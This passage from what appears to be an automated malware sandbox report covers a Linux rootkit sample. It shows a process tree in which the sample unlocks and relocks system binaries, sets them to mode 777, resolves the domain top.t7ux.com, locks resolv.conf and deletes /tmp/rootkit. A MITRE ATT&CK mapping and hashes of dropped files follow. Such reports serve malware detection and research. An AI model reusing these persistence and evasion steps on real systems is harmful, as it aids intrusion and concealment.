        lockr +i /usr/bin/dget
        5⤵
        
        PID:3061
    - - /usr/bin/lockr
        
        lockr -i /usr/bin/pkill
        5⤵
        
        PID:3062
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/pkill
        5⤵
        File and Directory Permissions Modification
        
        PID:3063
    - - /usr/bin/lockr
        
        lockr +i /usr/bin/pkill
        5⤵
        
        PID:3064
    - - /usr/bin/lockr
        
        lockr -i /usr/bin/nohup
        5⤵
        
        PID:3065
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/nohup
        5⤵
        File and Directory Permissions Modification
        
        PID:3066
    - - /usr/bin/lockr
        
        lockr +i /usr/bin/nohup
        5⤵
        
        PID:3067
    - - /usr/bin/lockr
        
        lockr -i /usr/bin/killall
        5⤵
        
        PID:3068
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/killall
        5⤵
        File and Directory Permissions Modification
        
        PID:3069
    - - /usr/bin/lockr
        
        lockr +i /usr/bin/killall
        5⤵
        
        PID:3070
    - - /usr/bin/lockr
        
        lockr -i /usr/bin/nslookup
        5⤵
        
        PID:3071
    - - /usr/bin/chmod
        
        chmod 777 /usr/bin/nslookup
        5⤵
        File and Directory Permissions Modification
        
        PID:3072
    - - /usr/bin/lockr
        
        lockr +i /usr/bin/nslookup
        5⤵
        
        PID:3073
    - - /usr/bin/cat
        
        cat /etc/long.conf
        5⤵
        
        PID:3075
    - - /usr/bin/awk
        
        awk "{print \$1}"
        5⤵
        
        PID:3076
    - - /usr/bin/date
        
        date "+%s%N"
        5⤵
        
        PID:3078
    - - /usr/bin/md5sum
        
        md5sum
        5⤵
        
        PID:3079
    - - /usr/bin/head
        
        head -c 10
        5⤵
        
        PID:3080
    - - /usr/bin/cat
        
        cat /etc/long.conf
        5⤵
        
        PID:3082
    - - /usr/bin/awk
        
        awk "{print \$2}"
        5⤵
        
        PID:3083
    - - /usr/bin/date
        
        date "+%s%N"
        5⤵
        
        PID:3085
    - - /usr/bin/md5sum
        
        md5sum
        5⤵
        
        PID:3086
    - - /usr/bin/head
        
        head -c 10
        5⤵
        
        PID:3087
    - - /usr/bin/nslookup
        
        nslookup top.t7ux.com
        5⤵
        Reads CPU attributes
        
        PID:3089
    - - /usr/bin/grep
        
        grep "Address: "
        5⤵
        
        PID:3090
    - - /usr/bin/awk
        
        awk "{print \$2}"
        5⤵
        
        PID:3091
    - - /usr/bin/lockr
        
        lockr -i /etc/
        5⤵
        
        PID:3099
    - - /usr/bin/lockr
        
        lockr -i /etc/resolv.conf
        5⤵
        
        PID:3100
    - - /usr/bin/lockr
        
        lockr +i /etc/resolv.conf
        5⤵
        
        PID:3101
    - - /usr/sbin/service
        
        service network restart
        5⤵
        
        PID:3102
      - /usr/bin/basename
        
        basename /usr/sbin/service
        6⤵
        
        PID:3103
      - /usr/bin/basename
        
        basename /usr/sbin/service
        6⤵
        
        PID:3104
    - - /usr/local/sbin/systemctl
        
        systemctl restart network.service
        5⤵
        
        PID:3102
    - - /usr/local/bin/systemctl
        
        systemctl restart network.service
        5⤵
        
        PID:3102
    - - /usr/sbin/systemctl
        
        systemctl restart network.service
        5⤵
        
        PID:3102
    - - /usr/bin/systemctl
        
        systemctl restart network.service
        5⤵
        
        PID:3102
    - - /usr/bin/sleep
        
        sleep 1
        5⤵
        
        PID:3105
    - - /usr/bin/nslookup
        
        nslookup top.t7ux.com
        5⤵
        Reads CPU attributes
        
        PID:3107
    - - /usr/bin/grep
        
        grep "Address: "
        5⤵
        
        PID:3108
    - - /usr/bin/awk
        
        awk "{print \$2}"
        5⤵
        
        PID:3109
  - - /usr/bin/lockr
      lockr -i /usr/bin/fd7c90b56a
      4⤵
      PID:3055
  - - /usr/bin/rm
      rm -f /usr/bin/fd7c90b56a
      4⤵
      PID:3057
- - /usr/bin/lockr
    lockr -i /usr/bin/f24a684025
    3⤵
    PID:2877
- - /usr/bin/rm
    rm -f /usr/bin/f24a684025
    3⤵
    PID:2879
- /usr/bin/lockr
  lockr -i /tmp/rootkit
  2⤵
  PID:2712
- /usr/bin/rm
  rm -f /tmp/rootkit
  2⤵
  PID:2714

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Adversary-in-the-Middle

T1557

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

OS Credential Dumping

T1003

/etc/passwd and /etc/shadow

T1003.008

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/long.conf

Filesize
22B

MD5
4f850c5903b40e9e32e8b02abb370738

SHA1
3f69b40b8ac497b0c55089bc337a984c5bb44db0

SHA256
497fd4fd9ddf0e8bb2b1a64c29db8d2d0d2446ef8832a5b025b20d61f179e2a5

SHA512
dd70ef2b01051a1a278142aa77f2792ffbbbd00f965aa194b984e6e885e9565b3d879bb093782695d6fe951d29eebbfbe6d125d63ed8ebe507d9cab3242d0fda

Download Submit
/etc/sed6ICcv3

Filesize
22B

MD5
52d64d99e6a860a776dada6095226a17

SHA1
dfa945817668b0ff8407885d1b99e6c52105130a

SHA256
e8a960a446e439db0e9e46f852de6635e318f337e0dfa13cd466e85a147ee23e

SHA512
82f41aefa0ff11f0c768fb629fd5de33585476a109ba8bf5bdc1ee85b9008d7d7b856009e1d5e6ed89f411884cb2f93efeb7ff5749bb4ffc1e027f0ec8f613a1

Download Submit
/etc/sedDzCzq0

Filesize
22B

MD5
4ef1ca739e7a3bfabad905d2a6db4905

SHA1
051eaf3d483348199ef281b12866cab01887ac7d

SHA256
3a86cc75841efe360989482e2b8bd5116534770d41740e5d1358e65ce871720d

SHA512
e149e3388eeceedbc5cafee3d082211d515b72ac2d6d18cd0467e77bcab8fb73740e061ab96ff7c9b1d3fbe32af7142f92adeb22438dad721e78a89a11871695

Download Submit
/etc/sedH4EnIV

Filesize
22B

MD5
21b232f5beca7d47c9c02eef5b883c3d

SHA1
f10d72ada0a2a0b855a143942895acfe685339bf

SHA256
b65c3dc24b5f1e1547be2dcf4e25a5149736a972c792e95949d1507fb5758263

SHA512
8c336e8df4939e52b90df6757e775f067e9aedc0eac44a21d04e871722f2c9fdc9f2cbf43c6f19576801b81c46509a8439b2642a079a0f8951b308145023ca2a

Download Submit
/etc/sedKjdCRP

Filesize
22B

MD5
9f3760fd675b454d0a33ecf7ce8b244f

SHA1
14f46f1361d862da6e0093b7e797c4bb801f1295

SHA256
13284f3db2c260e564a8fc3d798048f4d522c6624106ad2b6ff6d46fed165829

SHA512
4bf5bd368cbefb9ba76411695f1291ec6d53bdbaa6e8ad2a78d076cc578e3b568641add85ee5a0410ae51cfa5989586d8d62b4e1e4b68b241b281fe977b343fd

Download Submit
/etc/sedOxu4DF

Filesize
26B

MD5
e8653f192bfe3b326d5b83d2ac81a350

SHA1
711cd21da6f38819e7a7af366dd415194cf216b7

SHA256
1d9b393d3bd6e83799baa0ee0b0f72dc8e0b97e98b8159161114f1e0a1b4c212

SHA512
392b0eb2f102d36bbda8660bfc972f57c7885b5630f1a84f3c40d00fa8da53f1c53525d935e8cf866c2d311678433a5495f8173bff9a5cf69e13097832daaf82

Download Submit
/etc/sedQ7ghu5

Filesize
26B

MD5
a0ccb541bdc3e4f2aeebbed7c0b2872f

SHA1
732848e14bf35916515169f8cbe4a884c3f05b9a

SHA256
e25a6503aef7880d47c818781913cd38eec9bf2a0070ca34651b5ba3ed1330c7

SHA512
3ee7c8940cefdfa3ca2b8121b583af859e109d24774d16bf4a9e9f65b72abf35e2ed8f32be3b401cf584f39ab06be0447284aeaca3da434e79ac014073ff9aac

Download Submit
/etc/sedigVhLv

Filesize
22B

MD5
67132fefcbb0a6c961de8ae2de8afc4b

SHA1
cf1c68967e766f2bc2a85ee7d52f0d3f1b48eebf

SHA256
3023b290478f744e7a04b3a0a09111ff8992b1bd78d8bd9d3dad1d242a40ea7c

SHA512
8e4af5a9b041095a4481f8410c0a453fb7d2547f384bf610cebfd0728702bc82eced31495621772fcd611f39d2ca8e422e25bce11bb1477dea75c349276e0514

Download Submit
/etc/sedlKANsu

Filesize
22B

MD5
eaa91743c182ad49082d31d981790d72

SHA1
7317845682f46d2efc7ddbad0406856a90a8711c

SHA256
9e114baadde97aa98651141586dfe4fff57c08e6caa7e4bbaf3c173ba7b87381

SHA512
c33ecdfb94b4e5ec34f6383613cec2661cee8ed498740afbbf961d979c19761598593d1d726b2fb69bae4912b4031e6847a70d2b02497d0f4aeec3870ff8f47d

Download Submit
/etc/sedmkEfWf

Filesize
26B

MD5
652eba6c427e0e40c8079f5e4befb8b1

SHA1
8a4b95927d21c1205f5063161bc8c253c66c0716

SHA256
339b3ba90bc51f81a213cf9d8e47c79e91e874d2ffdaea444a2fb4c3ec4585e8

SHA512
6263be2f6beafa64db34c604b6b4500109a3dc54ea2a7096a1adb46a35dd8250b25032a88c9eee8c33978a1db8d915ff4f1bccd1873a43cbb59500c7507c6b5d

Download Submit
/usr/bin/sedE9gGVy

Filesize
119B

MD5
c010bd4f81c6f9e0c04c67c801068417

SHA1
b3dfa5e212799165bc85767092117820ec9ca62e

SHA256
c8851329479dcf3d610ec4a9d783ad9a7426e75f38be4fba9ce8e3adc437889c

SHA512
8805d49da434cbb88ecaa5fd8be56143f27dbc134fd1f1d7b95458e687c055b171dae0e2869b7b522bc364b9d3674393affe0c3d1ed761aac04a2b71b3179244

Download Submit
/usr/bin/sedFL1YEw

Filesize
119B

MD5
2d0a29a5d0e47ad85c82348557f071f2

SHA1
ada36f6ec1c10153d30ddc94b00da28395f5bfbd

SHA256
16ab4cee623308c1fdf17f59f2b3bf45c00ff6a78a67474fc9643b6eb19ed52c

SHA512
bae5278c91d562d7f8536e3b556667a0f16b20fd7fb4216b6c893fdddaa4d5cbada92d44afae60cdd3e5c1ee7f6371574db1070b018e4cd5a93e025eabc10de4

Download Submit
/usr/bin/sedYEJ9kh

Filesize
119B

MD5
637a23ac854101cf1d1e9536f42c0c62

SHA1
dfe7158fd7ae1aea5916ca3a27086441acfb2b5b

SHA256
5599ac0f3ebf29110c3a3e5108f21b1deedbb7da8ee4fa987eb592f60ed0fe4c

SHA512
bbf0f9df6e031da87572478006d5508adfe5f63f857d7c9072619de3265c1ec3adac504b1c58f485d5d54e097969318b1ac01bc3a8b36db0df4ea8d5b94aa909

Download Submit
/usr/bin/sedoF9q9j

Filesize
119B

MD5
90dbcc61d4bf5a21662076a3ba552cbc

SHA1
b2b5bdd0db6d482fb1246d97dfcb15d01e52b5c7

SHA256
d271336eac47d738c9b60d41b71302f5b92ab21c1dfc065b5ddebda26f1e3e62

SHA512
6a73ae321b772a4019ebec135e78f6d6156de3828f78f10c96f28a1d10a08ac314df7a8aa291bd627c145e4e077040bf22db99507a4b56aa0bd379fb6d999273

Download Submit
/usr/bin/seduIfs9P

Filesize
119B

MD5
398bf6a2074aaa321220622721e9c000

SHA1
ab1c07d79c31598f8a9d7b1ecb323acf5bfbbe75

SHA256
a11799a96ad06c2ba25f00c3e9e4bb26f7cace857e2f091f9855fe2cc2484405

SHA512
a0186382fa1023c09e3022464d710b808dc9f7ee137d2dd07ad3a032c1cd16d9f6378519f4e0bb9d43fe2adf8dd0441ef90faba9e0d8e2e333f17ffb976146b8

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads